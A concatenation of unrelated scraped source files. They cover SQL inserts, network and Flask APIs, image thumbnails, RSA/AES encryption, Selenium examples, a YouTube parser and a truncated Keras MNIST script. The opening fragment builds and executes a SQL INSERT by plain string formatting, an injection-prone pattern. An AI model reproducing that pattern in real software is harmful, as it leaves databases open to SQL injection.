sql = \"INSERT INTO %s ( %s ) VALUES ( %s )\" % (table, columns, values)\n print(\"sql\")\n print(sql)\n print(\"myDict.values()\")\n print(myDict.values())\n #cursor.execute(sql, myDict.values())\n #cursor.execute(sql, 'ABCD', '3/31/2018', '2', '20', 'D')\n #sql = \"INSERT INTO MONTHLYTRIP ( Company_Name, Month_End, Lux_VehCount, Lux_TripCount, Service_Mode ) VALUES ('ABCD', '3/31/2018', '2', '20', 'D');\"\n cursor.execute(sql)\n cnxn.commit() \n #print(\"row \")\n #print(row)\n #myDict = OrderedDict(row)\n #for key in myDict.keys():\n # print(key)\n #myDict.keys()\n #print(\"myDict.keys() \")\n #print(myDict.keys())\n #keyVal = True\n\ncnxn.close() ","sub_path":"WPA/VFH/Python/Scripts/jets.py","file_name":"jets.py","file_ext":"py","file_size_in_byte":5193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"93983862","text":"# Copyright 2015 Internap.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom netaddr import IPNetwork\n\nfrom netman.api.objects import Serializable\nfrom netman.core.objects.vrrp_group import VrrpGroup\n\n\nclass SerializableVrrpGroup(Serializable):\n def __init__(self, src):\n super(SerializableVrrpGroup, self).__init__(['id', 'ips', 'hello_interval', 'dead_interval', 'priority',\n 'track_id', 'track_decrement'])\n self.id = src.id\n self.ips = sorted([ipn.ip.format() for ipn in src.ips])\n self.priority = src.priority\n self.track_id = src.track_id\n self.track_decrement = src.track_decrement\n self.hello_interval = src.hello_interval\n self.dead_interval = src.dead_interval\n\n @classmethod\n def to_core(cls, **serialized):\n ips = serialized.pop('ips')\n return VrrpGroup(\n ips=[IPNetwork(ip) for ip in ips],\n ** serialized\n )\n","sub_path":"netman/api/objects/vrrp_group.py","file_name":"vrrp_group.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"527914884","text":"# Copyright (c) 2001-2016, Canal TP and/or its affiliates. All rights reserved.\n#\n# This file is part of Navitia,\n# the software to build cool stuff with public transport.\n#\n# Hope you'll enjoy and contribute to this project,\n# powered by Canal TP (www.canaltp.fr).\n# Help us simplify mobility and open public transport:\n# a non ending quest to the responsive locomotion way of traveling!\n#\n# LICENCE: This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n#\n# Stay tuned using\n# twitter @navitia\n# IRC #navitia on freenode\n# https://groups.google.com/d/forum/navitia\n# www.navitia.io\n\nfrom typing import Optional\n\nimport flask_restful\nfrom flask import Response\nfrom flask import request\nfrom marshmallow import ValidationError\nfrom pymongo.errors import PyMongoError, DuplicateKeyError\n\nfrom tartare.core import models\nfrom tartare.decorators import (\n JsonDataValidate,\n ValidateContributorPrepocessesDataSourceIds,\n CheckContributorIntegrity,\n ValidateUniqueDataSources,\n RemoveLastActiveJob,\n RemoveDataSetsSize,\n)\nfrom tartare import metrics_api_errors, metrics_api_time\nfrom tartare.exceptions import EntityNotFound, IntegrityException, ParameterException\nfrom tartare.http_exceptions import InvalidArguments, DuplicateEntry, InternalServerError, ObjectNotFound\nfrom tartare.interfaces import schema\nfrom tartare.interfaces.common_argrs import Pagination\nfrom tartare.processes.processes import ProcessManager\n\n\nclass Contributor(flask_restful.Resource, Pagination):\n @classmethod\n def __pre_save_contributor(cls, post_data: dict) -> models.Contributor:\n if \"data_prefix\" not in post_data:\n raise InvalidArguments(\"contributor data_prefix must be specified\")\n processes = post_data.get(\"processes\", [])\n ProcessManager.check_processes_for_instance(processes, \"contributor\")\n try:\n contributor = schema.ContributorSchema().load(post_data)\n contributor.add_computed_data_sources()\n return contributor\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except IntegrityException as exc:\n raise InvalidArguments(str(exc))\n\n metrics_api_errors_contributors_post = metrics_api_errors.labels(endpoint=\"contributors\", method=\"post\")\n metrics_api_time_contributors_post = metrics_api_time.labels(endpoint=\"contributors\", method=\"post\")\n\n @metrics_api_errors_contributors_post.count_exceptions()\n @metrics_api_time_contributors_post.time()\n @JsonDataValidate()\n @ValidateUniqueDataSources()\n @ValidateContributorPrepocessesDataSourceIds()\n @CheckContributorIntegrity()\n def post(self) -> Response:\n post_data = request.json\n contributor = self.__pre_save_contributor(post_data)\n\n try:\n contributor.save()\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except DuplicateKeyError as e:\n raise DuplicateEntry(\"duplicate entry: {}\".format(str(e)))\n except PyMongoError:\n raise InternalServerError(\"impossible to add contributor {}\".format(contributor))\n\n return ({\"contributors\": [schema.ContributorSchema().dump(models.Contributor.get(contributor.id))]}, 201)\n\n metrics_api_errors_contributors_get = metrics_api_errors.labels(endpoint=\"contributors\", method=\"get\")\n metrics_api_time_contributors_get = metrics_api_time.labels(endpoint=\"contributors\", method=\"get\")\n\n @metrics_api_errors_contributors_get.count_exceptions()\n @metrics_api_time_contributors_get.time()\n def get(self, contributor_id: Optional[str] = None) -> Response:\n try:\n if contributor_id:\n result = schema.ContributorSchema().dump(models.Contributor.get(contributor_id))\n return {\"contributors\": [result]}, 200\n contributors, total = models.Contributor.get_some(\n data_formats=request.args.getlist(\"data_formats\"),\n coverage_id=request.args.get(\"coverage_id\"),\n data_source_id=request.args.get(\"data_source_id\"),\n page=self.page,\n per_page=self.per_page,\n )\n return (\n {\n \"contributors\": schema.ContributorSchema(many=True).dump(contributors),\n \"pagination\": {\"page\": self.page, \"per_page\": self.per_page, \"total\": total},\n },\n 200,\n )\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except EntityNotFound as e:\n raise ObjectNotFound(str(e))\n except ParameterException as e:\n raise InvalidArguments(str(e))\n\n metrics_api_errors_contributors_delete = metrics_api_errors.labels(endpoint=\"contributors\", method=\"delete\")\n metrics_api_time_contributors_delete = metrics_api_time.labels(endpoint=\"contributors\", method=\"delete\")\n\n @metrics_api_errors_contributors_delete.count_exceptions()\n @metrics_api_time_contributors_delete.time()\n def delete(self, contributor_id: str) -> Response:\n try:\n c = models.Contributor.delete(contributor_id)\n if c == 0:\n raise ObjectNotFound(\"contributor '{}' not found\".format(contributor_id))\n return \"\", 204\n except IntegrityException as e:\n raise InvalidArguments(f\"unable to delete contributor {contributor_id}: {str(e)}\")\n\n metrics_api_errors_contributors_put = metrics_api_errors.labels(endpoint=\"contributors\", method=\"put\")\n metrics_api_time_contributors_put = metrics_api_time.labels(endpoint=\"contributors\", method=\"put\")\n\n @metrics_api_errors_contributors_put.count_exceptions()\n @metrics_api_time_contributors_put.time()\n @JsonDataValidate()\n @RemoveLastActiveJob()\n @ValidateUniqueDataSources()\n @ValidateContributorPrepocessesDataSourceIds()\n @CheckContributorIntegrity(True)\n @RemoveDataSetsSize()\n def put(self, contributor_id: str) -> Response:\n post_data = request.json\n if \"id\" in post_data and contributor_id != post_data[\"id\"]:\n raise InvalidArguments(\"the modification of the id is not possible\")\n post_data[\"id\"] = contributor_id\n new_contributor = self.__pre_save_contributor(post_data)\n try:\n existing_contributor = models.Contributor.get(contributor_id)\n # we check if a data source has been removed and not used anywhere\n data_source_ids = existing_contributor.has_one_of_data_source_removed(new_contributor)\n if len(data_source_ids):\n existing_contributor.check_contributors_using_integrity(data_source_ids)\n existing_contributor.check_coverages_using_integrity(data_source_ids)\n\n existing_contributor.update_with_object(new_contributor)\n except IntegrityException as e:\n raise InvalidArguments(f\"unable to update contributor {existing_contributor.get_id()}: {str(e)}\")\n except ValidationError as err:\n raise InvalidArguments(err.messages)\n except EntityNotFound as e:\n raise ObjectNotFound(str(e))\n except DuplicateKeyError as e:\n raise DuplicateEntry(\"duplicate entry: {}\".format(str(e)))\n except PyMongoError:\n raise InternalServerError(\"impossible to add contributor {}\".format(new_contributor))\n\n return ({\"contributors\": [schema.ContributorSchema().dump(models.Contributor.get(contributor_id))]}, 200)\n","sub_path":"tartare/interfaces/contributors.py","file_name":"contributors.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"619528473","text":"# Copyright 2015 Google Inc. All Rights Reserved.\n\"\"\"The gcloud datastore emulator group.\"\"\"\n\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.emulators.lib import datastore_util\n\n\nclass Datastore(base.Group):\n \"\"\"Manage your local datastore emulator.\n\n This set of commands allows you to start and use a local datastore emulator.\n \"\"\"\n\n detailed_help = {\n 'DESCRIPTION': '{description}',\n 'EXAMPLES': \"\"\"\\\n To start a local datastore emulator, run:\n\n $ {command} start\n \"\"\",\n }\n\n @staticmethod\n def Args(parser):\n parser.add_argument(\n '--data-dir',\n required=False,\n help='The directory to be used to store/retrieve data/config for an'\n ' emulator run.')\n\n def Filter(self, context, args):\n datastore_util.CheckIfJava7IsInstalled()\n datastore_util.EnsureGCDComponentIsInstalled()\n\n if not args.data_dir:\n args.data_dir = datastore_util.GetDataDir()\n","sub_path":"googsdk/google-cloud-sdk/lib/googlecloudsdk/emulators/commands/datastore/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"455430444","text":"# Copyright 2023 UW-IT, University of Washington\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\" Changes\n =================================================================\n\n sbutler1@illinois.edu: move some of the URL parameter parsing into\n here to simplify the URL patterns; adapt to the new RESTDispatch\n framework.\n\"\"\"\ntry:\n from cStringIO import StringIO as IOStream\nexcept ModuleNotFoundError:\n from io import BytesIO as IOStream\n\nfrom spotseeker_server.views.rest_dispatch import RESTDispatch, RESTException\nfrom spotseeker_server.models import ItemImage, Item\nfrom django.http import HttpResponse\nfrom django.utils.http import http_date\nfrom spotseeker_server.require_auth import app_auth_required\nfrom PIL import Image\nimport time\nimport re\n\nRE_WIDTH = re.compile(r\"width:(\\d+)\")\nRE_HEIGHT = re.compile(r\"height:(\\d+)\")\nRE_WIDTHxHEIGHT = re.compile(r\"^(\\d+)x(\\d+)$\")\n\n\nclass ItemThumbnailView(RESTDispatch):\n \"\"\"Returns 200 with a thumbnail of a ItemImage.\"\"\"\n\n @app_auth_required\n def GET(\n self,\n request,\n item_id,\n image_id,\n thumb_dimensions=None,\n constrain=False,\n ):\n img = ItemImage.objects.get(pk=image_id)\n item = img.item\n\n if int(item.pk) != int(item_id):\n raise RESTException(\n \"Image Item ID doesn't match item id in url\", 404\n )\n\n if thumb_dimensions is None:\n raise RESTException(\"Image constraints required\", 400)\n\n thumb_width = None\n thumb_height = None\n if constrain:\n m = RE_WIDTH.search(thumb_dimensions)\n if m:\n thumb_width = m.group(1)\n m = RE_HEIGHT.search(thumb_dimensions)\n if m:\n thumb_height = m.group(1)\n\n if thumb_width is None and thumb_height is None:\n raise RESTException(\"Image constraints required\", 400)\n elif thumb_width is None:\n thumb_width = img.width\n elif thumb_height is None:\n thumb_height = img.height\n else:\n m = RE_WIDTHxHEIGHT.match(thumb_dimensions)\n if not m:\n raise RESTException(\"Image constraints required\", 400)\n else:\n thumb_width = m.group(1)\n thumb_height = m.group(2)\n\n thumb_width = int(thumb_width)\n thumb_height = int(thumb_height)\n\n if thumb_height <= 0 or thumb_width <= 0:\n raise RESTException(\"Bad image constraints\", 400)\n\n image = img.image\n im = Image.open(image.file)\n\n if constrain:\n im.thumbnail((thumb_width, thumb_height), resample=Image.LANCZOS)\n thumb = im\n else:\n thumb = im.resize(\n (thumb_width, thumb_height), resample=Image.LANCZOS\n )\n\n tmp = IOStream()\n thumb.save(tmp, im.format, quality=95)\n tmp.seek(0)\n\n response = HttpResponse(tmp.getvalue(), content_type=img.content_type)\n # 7 day timeout?\n response[\"Expires\"] = http_date(time.time() + 60 * 60 * 24 * 7)\n return response\n","sub_path":"spotseeker_server/views/item_thumbnail.py","file_name":"item_thumbnail.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"61366689","text":"from Crypto.PublicKey import RSA\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Cipher import AES, PKCS1_OAEP\n\n\nclass Crypt(object):\n def __init__(self, private_pem, receiver_public_pem):\n super(Crypt, self).__init__()\n\n self.private_key = RSA.import_key(private_pem)\n self.receiver_public_key = RSA.import_key(receiver_public_pem)\n\n def encrypt(self, data):\n key = self.receiver_public_key\n session_key = get_random_bytes(16)\n\n cipher_rsa = PKCS1_OAEP.new(key)\n enc_session_key = cipher_rsa.encrypt(session_key)\n\n cipher_aes = AES.new(session_key, AES.MODE_EAX)\n ciphertext, tag = cipher_aes.encrypt_and_digest(data)\n\n nonce = cipher_aes.nonce\n\n encrypted_data = b\"\".join([enc_session_key, nonce, tag, ciphertext])\n return encrypted_data\n\n def decrypt(self, encrypted_data):\n key = self.private_key\n key_size = key.size_in_bytes()\n\n enc_session_key = encrypted_data[0:key_size]\n nonce = encrypted_data[key_size : key_size + 16]\n tag = encrypted_data[key_size + 16 : key_size + 32]\n ciphertext = encrypted_data[key_size + 32 :]\n\n cipher_rsa = PKCS1_OAEP.new(key)\n session_key = cipher_rsa.decrypt(enc_session_key)\n\n cipher_aes = AES.new(session_key, AES.MODE_EAX, nonce)\n data = cipher_aes.decrypt_and_verify(ciphertext, tag)\n return data\n","sub_path":"device/crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"69274382","text":"\nclass Solution(object):\n def numberOfArithmeticSlices(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n\n ACE\n 35 ms\n\n O(n)\n\n https://leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms\n leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms/94634\n leetcode.com/problems/arithmetic-slices/discuss/90058/Simple-Java-solution-9-lines-2ms/94631\n \"\"\"\n curr, res = 0, 0\n for i in range(2, len(A)):\n if A[i] - A[i-1] == A[i-1] - A[i-2]:\n curr += 1\n res += curr\n else:\n curr = 0\n return res\n\n def numberOfArithmeticSlicesV1(self, A):\n \"\"\"\n :type A: List[int]\n :rtype: int\n\n ACE\n 35 ms\n\n BRUTE FORCE\n\n for each possible slice, check if it is arithemetic; if it is arithmetic then increment the result\n\n SLIDING WINDOW\n\n use a sliding window to check for arithmetic slices.\n if no slice is found from lo then lo = lo + 1.\n if a slice (of minimum length 3) is found from lo then\n update result according to the formula:\n\n slice_length = hi - lo + 1\n res += 1 + (slice_length - 3)\n\n this is because for longer slices we form additional results by\n including or excluding elements at the lowest indices.\n\n for example, given a slice length of 4, we can include the lowest\n element and exclude the lowest element to form two new slices to\n count in the result.\n \"\"\"\n N = len(A)\n lo = 0\n res = 0\n while lo <= N - 3:\n hi = lo + 1\n difference = A[hi] - A[lo]\n while hi < N and A[hi] - A[hi - 1] == difference:\n hi += 1\n slice_length = hi - lo\n if slice_length >= 3:\n res += 1 + slice_length - 3\n lo = hi - 1 # ?\n # if hi - lo + 1 >= 3:\n # lo = hi\n # else:\n # lo = lo + 1\n\n return res\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [1, 2, 3, 4],\n 3\n ),\n (\n [1, 1, 2, 5, 7],\n 0\n ),\n (\n [0, 1, 3, 5, 7, 17, 27],\n 4\n ),\n (\n [11, 21, 31, 41, 51],\n 6\n ),\n ]\n for A, exp in tests:\n print(A)\n res = s.numberOfArithmeticSlices(A)\n print(res)\n assert res == exp\n\n\n","sub_path":"413_arithmetic_slices.py","file_name":"413_arithmetic_slices.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"74943427","text":"import selenium\nfrom selenium.webdriver import Chrome, ChromeOptions\n\ntry:\n \"\"\"umihico\"\"\"\n from apigateway_credentials import awsgateway_url, awsgateway_apikey\nexcept Exception as e:\n \"\"\"others users, developers\"\"\"\n awsgateway_apikey = \"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n awsgateway_url = \"https://XXXXXXXXXX.execute-api.us-west-2.amazonaws.com/default/chromeless\"\n\ntry:\n \"\"\"developers (cloners)\"\"\"\n from pypi.chromeless.chromeless import Chromeless, LambdaAlreadyTriggeredException\nexcept Exception as e:\n \"\"\"script downloaders\"\"\"\n from chromeless import Chromeless, LambdaAlreadyTriggeredException\n\n\ndef get_title(self, url):\n self.get(url)\n return self.title\n\n\ndef example_of_get_title():\n \"\"\"basic example\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_title)\n result = chrome.get_title(\"https://google.com\")\n print(result, type(result))\n # Google \n\n\ndef get_list(self):\n self.get(\"https://stackoverflow.com/\")\n question_titles = [e.text for e in self.find_elements_by_xpath(\n \"//h3/a[@class='question-hyperlink']\")]\n return question_titles\n\n\ndef example_of_get_list():\n \"\"\"you can get any type if it's picklable. this is example\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_list)\n result = chrome.get_list()\n print(result[:2], type(result))\n # ['JSoup: how to list links from a list?', 'How to Fix PHPSESSID issue in Symfony 3.4'] \n\n\ndef get_title_letter_num(self, url):\n return len(self.get_title(url))\n\n\ndef example_of_get_title_letter_num():\n \"\"\"\n you can call only one method,\n but you can bind multiple method and use them all by wrapping.\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_title)\n chrome.attach_method(get_title_letter_num)\n result = chrome.get_title_letter_num(\"http://github.com\")\n print(result, type(result))\n # 58 \n\n\ndef get_screenshot(self, url, filename):\n self.get(url)\n self.save_screenshot(filename)\n\n\ndef example_of_get_screenshot():\n \"\"\"\n just use the same local path argument as same as origin Chrome.save_screenshot(path).\n Chromeless will transfer from lambda to your local.\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(get_screenshot)\n result = chrome.get_screenshot(\"https://www.yahoo.co.jp/\", \"screenshot.png\")\n print(result, type(result))\n # None \n\n\ndef example_of_default_method():\n \"\"\"\n you can also run simple default method on Chrome\n \"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n result = chrome.get(\"http://aws.amazon.com\")\n print(result, type(result))\n # None \n\n\ndef example_of_twice_called_error():\n \"\"\"you can't call method more than once\"\"\"\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.get(\"http://github.com\")\n try:\n chrome.get(\"https://google.com\")\n except LambdaAlreadyTriggeredException as e:\n print('(expected error)', e)\n # (expected error) If you have multiple methods, please wrap them and call the wrapper instead.\n\n\ndef cause_NoSuchElementException(self):\n self.get(\"http://github.com\")\n self.find_element_by_xpath(\"//nonexistelement\") # cause NoSuchElementException in lambda\n\n\ndef example_of_cause_NoSuchElementException():\n chrome = Chromeless(awsgateway_url, awsgateway_apikey)\n chrome.attach_method(cause_NoSuchElementException)\n try:\n chrome.cause_NoSuchElementException()\n except selenium.common.exceptions.NoSuchElementException as e:\n print('(expected error)', e)\n\n\ndef example_of_changing_windowsize():\n chrome_options = ChromeOptions()\n chrome_options.add_argument(\"--headless\")\n chrome_options.add_argument(\"--disable-gpu\")\n chrome_options.add_argument(\"--window-size=1920x1080\")\n # default is \"--window-size=1280x1696\"\n chrome_options.add_argument(\"--disable-application-cache\")\n chrome_options.add_argument(\"--disable-infobars\")\n chrome_options.add_argument(\"--no-sandbox\")\n chrome_options.add_argument(\"--hide-scrollbars\")\n chrome_options.add_argument(\"--enable-logging\")\n chrome_options.add_argument(\"--log-level=0\")\n chrome_options.add_argument(\"--single-process\")\n chrome_options.add_argument(\"--ignore-certificate-errors\")\n chrome_options.add_argument(\"--homedir=/tmp\")\n chrome = Chromeless(awsgateway_url, awsgateway_apikey, chrome_options=chrome_options)\n chrome.attach_method(get_screenshot)\n result = chrome.get_screenshot(\"https://github.com/umihico\", \"screenshot.png\")\n print(result, type(result))\n\n\nif __name__ == '__main__':\n example_of_get_title()\n example_of_get_list()\n example_of_get_title_letter_num()\n example_of_get_screenshot()\n example_of_default_method()\n example_of_twice_called_error()\n example_of_cause_NoSuchElementException()\n example_of_changing_windowsize()\n","sub_path":"examples.py","file_name":"examples.py","file_ext":"py","file_size_in_byte":5068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"434568217","text":"# -*- coding: utf-8 -*-\n\nimport tensorflow as tf\nimport numpy as np\nimport csv\nimport time as timefunc\nimport sys\nimport os\nimport pandas as pd\nimport cv2\nfrom tqdm import tqdm\nimport subprocess\nimport math\nimport gc\n\nwork_dirname = (os.path.dirname(os.path.abspath(__file__)))\nimport ShareNetFunc as nfunc\nfrom ImageGenerator import ImageGenerator\n\nclass EvaCkpt:\n def __init__(self, net_cls, path_cls, exe_file,\n model_hw=[256,256,], fin_activate='sigmoid',\n standardization_csv_path=None, \n standardization=False):\n self.net_cls = net_cls\n self.path_cls = path_cls\n self.exe_file = exe_file\n self.model_h = model_hw[0]\n self.model_w = model_hw[1]\n self.fin_activate = fin_activate\n self.standardization_csv_path = standardization_csv_path\n self.standardization = standardization\n self.csv_header = ['step',\n 'short', \n 'break+break_same', \n 'total',\n 'division', \n 'short_area',\n 'break_area', \n 'break_same_area']\n\n def run(self, img_path_set, ans_path_set):\n # imagenameの取得\n img_name_set = []\n for img_index in range(len(img_path_set)):\n s = img_path_set[img_index].find('L00')\n img_n = (img_path_set[img_index][s: s+5])\n img_name_set.append(img_n)\n\n # workfolderの作成\n work_path = self.path_cls.get_outroot_path() + '/workfolder'\n os.makedirs(work_path, exist_ok=True)\n\n # csvファイルの作成\n csv_file_names = []\n for img_index in range(len(img_path_set)):\n img_path = img_path_set[img_index]\n img_name = img_name_set[img_index]\n csv_file = self.path_cls.make_csv_path('eva_ckpt_'+img_name+'.csv')\n csv_file_names.append(csv_file)\n if not os.path.isfile(csv_file):\n with open(csv_file, 'w') as f:\n writer_total = csv.writer(f, lineterminator='\\n')\n writer_total.writerow(self.csv_header)\n\n # checkpoint の検索\n ckpt_path_set = self.path_cls.search_checkpoint_path()\n\n # checkpoint の変更\n for ckpt_index in range(len(ckpt_path_set)):\n print('========== now ckpt: ' +str(ckpt_index+1)+ ' / '+ str(len(ckpt_path_set)) + ' ==========')\n ckpt_path = ckpt_path_set[ckpt_index]\n self.net_cls.ckpt_restore(ckpt_path)\n step = self.net_cls.get_step()\n\n # 過去のmodel削除\n model_path = os.path.join(work_path, 'ckpt_model.h5')\n if os.path.exists( model_path ):\n os.remove( model_path )\n\n # modelの生成\n model_path = os.path.join(work_path, 'ckpt_model.h5')\n self.net_cls.get_generator().save(model_path)\n\n # 処理する画像リストの生成\n param_csv_path = work_path + '/param.csv'\n img_csv_path = work_path + '/img.csv'\n\n if self.standardization_csv_path is None:\n s_csv_path = 'None'\n\n with open(param_csv_path, 'w') as f:\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow(['model_h', 'model_w', 'padding', 'model_path', 'fin_activate',\n 'standardization_csv_path', 'standardization', 'work_dirname', 'work_path',])\n writer.writerow([self.model_h, self.model_w, self.net_cls.get_padding(),\n model_path, self.fin_activate,\n s_csv_path, self.standardization,\n work_dirname, work_path,])\n\n flg = False\n with open(img_csv_path, 'w') as f:\n writer = csv.writer(f, lineterminator='\\n')\n writer.writerow(['img_path', 'ans_path'])\n\n for img_index in range(len(img_path_set)):\n csv_file = csv_file_names[img_index]\n df = pd.read_csv(csv_file)\n if step in df['step'].values:\n continue\n flg = True\n writer.writerow([\n img_path_set[img_index],\n ans_path_set[img_index], \n ])\n # 実行\n # if flg:\n subprocess.call('python ' + work_dirname + '/eva.py ' + param_csv_path + ' ' + img_csv_path)\n\n","sub_path":"20210313/func/old/EvaCkpt.py","file_name":"EvaCkpt.py","file_ext":"py","file_size_in_byte":4612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"188197499","text":"#! /usr/bin/python3\n# coding: utf-8\n\nimport json\n\nclass ytVideoInfo(object):\n\t\n\tdef __init__(self, VideoInfoRowData):\n\t\t# VideoInfoRowData is str\n\t\t\n\t\tself.ytInitialData = ytInitialData()\n\t\tself.ytsetconfig = ytsetconfig()\n\t\tself.ytplayerconfig = ytplayerconfig()\n\t\t\n\t\t\n\t\t\t\n\nclass ytInitialData(object):\n\tdef __init__(self, RowData):\n\t\t\n\t\tself.obj = RowData\n\t\t\n\t\tself.parseDatas = {\n\t\t\t'nextRowVideolist': {0: 'playerOverlays', 1:'playerOverlayRenderer', 2:'endScreen', 3:'watchNextEndScreenRenderer', 4:'results'},\n\t\t}\n\t\t\t\n\t\t\t\n\tdef parse(self):\n\t\t\n\t\tfor k, v in self.parseDatas.items():\n\t\t\tgetdata = None\n\t\t\tfor i in sorted(v.keys()):\n\t\t\t\tif i == 0:\n\t\t\t\t\tgetdata = self.obj[v[i]]\n\t\t\t\telse:\n\t\t\t\t\tgetdata = getdata[v[i]]\n\t\t\t\n\t\t\tsetattr(self, k, getdata)\n\t\n\tdef getVideoInfo(self):\n\t\t\n\t\tvideos = []\n\t\tfor row in getattr(self, 'nextRowVideolist'):\n\t\t\tvideo = Video(row)\n\t\t\tif 'ID' in dir(video):\n\t\t\t\tvideos.append(video)\n\t\t\t\n\t\tsetattr(self, 'Videos', videos)\n\t\t\n\t\t\nclass Video(object):\n\t\n\tdef __init__(self, Row):\n\t\t\n\t\turl = 'https://www.youtube.com'\n\t\t\n\t\tif not \"endScreenVideoRenderer\" in Row.keys():\n\t\t\treturn None\n\t\t\t\n\t\t\n\t\tself.ID = Row[\"endScreenVideoRenderer\"][\"videoId\"]\n\t\tself.title = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"title\"][\"simpleText\"]\n\t\tself.href = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"navigationEndpoint\"][\"commandMetadata\"]\\\n\t\t[\"webCommandMetadata\"][\"url\"]\n\t\tself.URL = url + self.href\n\t\tself.accessLabel = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"title\"][\"accessibility\"][\"accessibilityData\"]\\\n\t\t[\"label\"]\n\t\tself.view = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortViewCountText\"][\"simpleText\"]\n\t\tself.channel = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortBylineText\"][\"runs\"][0][\"text\"]\n\t\tself.channelID = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"shortBylineText\"][\"runs\"][0][\"navigationEndpoint\"]\\\n\t\t[\"browseEndpoint\"][\"browseId\"]\n\t\tself.Upload = Row[\"endScreenVideoRenderer\"]\\\n\t\t[\"publishedTimeText\"][\"simpleText\"]\n \n\t\tif \"lengthInSeconds\" in Row[\"endScreenVideoRenderer\"].keys():\n\t\t\tself.length = Row[\"endScreenVideoRenderer\"]\\\n\t\t\t[\"lengthInSeconds\"]\n\t\telse:\n\t\t\tself.length = None\n\t\t\n\n\t\t\n\t\t\nclass ytsetconfig(object):\n\tdef __init__(self):\n\t\tself.obj = toJson(RowData)\n\t\t\n\t\tpass\n\t\t\nclass ytplayerconfig(object):\n\tdef __init__(self):\n\t\tself.obj = toJson(RowData)\n\t\t\n\t\tpass\n\ndef toJson(rowdata):\n\t\n\treturn json.loads(rowdata)\n\t\n","sub_path":"ytVideo.py","file_name":"ytVideo.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"598452364","text":"import sys\n\nimport keras\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.models import Sequential\n\nSHAPE = (28, 28, 1)\nLOUD = False\nBATCH_SIZE = 128\nEPOCHS = 12\npre_learn_weights = []\npost_learn_weights = []\nDATA_SET = 'MNIST'\n\n\ndef load_data():\n x_trn = np.load(DATA_SET + '/trainImages.npy').astype(np.float32) / 255.0\n y_trn = np.load(DATA_SET + '/trainLabels.npy').astype(np.float32)\n x_tst = np.load(DATA_SET + '/testImages.npy').astype(np.float32) / 255.0\n y_tst = np.load(DATA_SET + '/testLabels.npy').astype(np.float32)\n x_trn = x_trn.reshape((len(x_trn),) + SHAPE)\n x_tst = x_tst.reshape((len(x_tst),) + SHAPE)\n return x_trn, y_trn, x_tst, y_tst\n\n\ndef extract_weights():\n arr = np.array([])\n for layer in model.layers:\n for w in layer.get_weights():\n arr = np.append(arr, np.array(w).flatten())\n return arr\n\n\ndef mrs_labeled():\n pred = model.predict_classes(x_test)\n true_class = y_test.argmax(axis=1)\n incorrects = np.nonzero(pred != true_class)\n class_examples = [(incorrects[0][true_class[incorrects] == cls]) for cls in range(10)]\n for cls_ex in class_examples:\n if len(cls_ex):\n 